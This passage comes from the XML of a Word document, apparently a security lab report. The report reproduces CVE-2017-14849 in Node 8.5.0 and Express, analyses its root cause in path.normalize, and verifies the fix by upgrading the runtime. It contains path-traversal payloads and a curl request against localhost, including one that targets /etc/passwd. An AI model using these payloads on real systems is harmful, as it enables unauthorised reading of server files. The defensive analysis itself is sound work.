      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>X-Powered-By: Express</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Accept-Ranges: bytes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Content-Type: text/plain; charset=UTF-8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>Content-Length: 57</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SECRET_FLAG{this-file-lives-outside-the-static-root}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 file `secret.txt` sits in the project root, two levels above the directory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>that `express.static()` is configured to serve. The server returned it anyway.</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Two details that matter when reproducing this by hand:</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`curl` normalises `..` in a URL by default. Without `--path-as-is` the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  payload never reaches the server and the attack appears not to work.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>* On Windows the exact payload differs from the Linux PoC in the vulhub</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  README (`/static/../../../a/../../../../etc/passwd`), because the resulting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  absolute path is built from a drive-letter root. The shape that escapes on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  Windows is `/static/../foo/../../secret.txt`.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6.3 Root cause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 guard inside `send@0.15.6` is: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```js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>// send/index.js, line 538</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>if (UP_PATH_REGEXP.test(normalize('.' + sep + path))) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">  return this.error(403)          // reject anything that still contains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line 545</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>path = normalize(join(root, path))  // then build the real path</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 check only works if `normalize()` is correct. Under Node 8.5.0 it is not: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```text</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>$ node-v8.5.0 -e "console.log(require('path').normalize('../foo/../../secret.txt'))"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>secret.txt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node   v24 -e "console.log(require('path').normalize('../foo/../../secret.txt'))"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>..\..\secret.txt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Two leading `..` segments disappear in 8.5.0, so after normalisation there is</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>nothing left for `UP_PATH_REGEXP` to match, the request is treated as a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>*clean* relative path, and `join(root, 'secret.txt')` is resolved — one level</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>above `root`.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So the answer to "what kind of error is this" is: **a logic error in a language</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>runtime library**, not a missing input filter and not a configuration mistake.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>The application did exactly what the documentation told it to do; the standard</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>library lied about the meaning of `..`.</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6.4 Fix</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The fix is a runtime upgrade — `fixes/` contains the changed files.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```dockerfile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># before</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>FROM vulhub/node:8.5.0</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minimal fix</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>FROM node:8.6.0</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recommended</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>FROM node:20-alpine</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No application source changes are needed; `www/app.js` is byte-for-byte</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>identical before and after.</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Why this is effective rather than a workaround: the `send` guard is built on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>the invariant "after `normalize()`, any remaining `..` means an escape</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>attempt". Node 8.6.0 restores that invariant, so every library that depends on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>it — not just this one application — is corrected at once. Filtering the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>request upstream would have to re-implement path semantics, which is precisely</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>the kind of code that produces the next traversal bug.</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6.5 Proof of elimination</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Same application, same request, fixed runtime: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 after about 3 s of downtime to swap the interpreter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>node www/app.js          # Node 24</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curl --path-as-is -s -i 'http://127.0.0.1:3000/static/../foo/../../secret.txt'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```http</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>HTTP/1.1 404 Not Found</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**Regression test** — the legitimate functionality still works:</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```bash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>curl --path-as-is -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:3000/static/main.js</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># 200</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>curl --path-as-is -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:3000/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t># 200</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Raw transcripts: [`evidence/01-vulnerable-response.txt`](evidence/01-vulnerable-response.txt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>and [`evidence/02-fixed-response.txt`](evidence/02-fixed-response.txt).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As a cross-check, SCA on the pinned vulnerable tree reports what one would</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>expect from an end-of-life runtime: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cd cve/CVE-2017-14849 &amp;&amp; npm audit --registry=https://registry.npmjs.org</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>8 vulnerabilities (2 low, 4 high, 2 critical)</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versus `0 vulnerabilities` in the API project itself.</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7. Repository layout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src/                      API source</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   ├── app.js                routes, JWT middleware, error handling</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   ├── db.js                 schema and all prepared statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   └── security.js           validation and output encoding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── scripts/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   ├── seed.js               demo users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   └── test.js               14 automated checks</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── cve/CVE-2017-14849/       vulhub scenario, reproduced natively</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   ├── www/app.js            the vulnerable application (unmodified)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>│   └── probe.js              path-handling probe used for the root-cause analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>├── fixes/                    CVE fix: Dockerfiles, compose file, notes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F6FA"/>
        <w:spacing w:before="0" w:after="0" w:line="188" w:lineRule="exact"/>
        <w:ind w:left="113" w:right="113"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="14"/>
        </w:rPr>
